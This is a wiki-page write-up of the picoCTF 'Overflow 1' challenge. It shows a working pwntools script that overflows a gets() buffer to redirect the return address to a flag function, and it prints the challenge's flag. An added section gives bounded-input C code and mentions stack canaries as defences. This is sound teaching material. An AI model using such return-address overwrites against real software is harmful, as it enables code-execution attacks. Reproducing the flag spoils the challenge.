Overflow 1
cheaterdxd edited this page Oct 10, 2019
You beat the first overflow challenge. Now overflow the buffer and change the return address to the flag function in this program? You can find it in /problems/overflow-1_5_c76a107db1438c97f349f6b2d98fd6f8 on the shell server. Source.
Hints: Take control of that return address. Make sure your address is in Little Endian.
In the vuln() function, you can see that gets() does not check the bound of the input, so you can overwrite the return address of vuln(), which is stored at ebp+4.
The distance from buf to ebp+4 is 0x4c bytes, so the payload looks like:
payload = 'a'*0x4c + flag_address
The flag_address is 0x80485e6 and must be written in Little Endian (p32() does this for you).
```python
from pwn import *

s = process("./vuln")
flag = 0x80485e6          # address of the flag function
payload = b'a' * 0x4c     # padding from buf up to the saved return address at ebp+4
payload += p32(flag)      # 32-bit address packed in Little Endian
s.sendline(payload)
s.interactive()
```
picoCTF{n0w_w3r3_ChaNg1ng_r3tURn532066483}
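The bug the write-up relies on is gets() writing into a fixed-size stack buffer with no length check. As an added example (not code from the challenge or the write-up, and with an assumed buffer size and function names), here is the bounded replacement a developer would use instead, with a constructed input of the same shape as the payload above to show that nothing past the buffer is ever written:

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary. BUF_SIZE and the function names
 * are assumptions for illustration. */
#define BUF_SIZE 64

/* Bounded copy: writes at most cap bytes to dst, including the terminator.
 * Returns 1 if src was longer than fits (the case that overflows with
 * gets()), 0 otherwise. */
int copy_bounded(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    int truncated = (n >= cap);
    size_t take = truncated ? cap - 1 : n;
    memcpy(dst, src, take);
    dst[take] = '\0';
    return truncated;
}

/* Drop-in replacement for gets(): fgets() is told the buffer size, so a long
 * line is cut at cap-1 bytes instead of spilling over the saved ebp and the
 * return address. Strips the trailing newline. Returns 1 on success, 0 on
 * EOF or error. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return 0;
    dst[strcspn(dst, "\n")] = '\0';
    return 1;
}

int main(void)
{
    char buf[BUF_SIZE];
    /* Constructed input: 0x4c padding bytes plus 4 more, the same shape as
     * the write-up's payload. */
    char payload[0x4c + 4 + 1];
    memset(payload, 'a', 0x4c + 4);
    payload[0x4c + 4] = '\0';

    if (copy_bounded(buf, sizeof buf, payload))
        printf("truncated to %zu bytes; nothing past buf[%d] is written\n",
               strlen(buf), BUF_SIZE - 1);
    return 0;
}
```

With the bounded read in place the 0x4c-byte distance to ebp+4 no longer matters, because input is cut before it reaches the saved frame. Building with -fstack-protector adds a second, independent line of defence: a canary between buf and the saved registers that aborts the process before an overwritten return address is ever used.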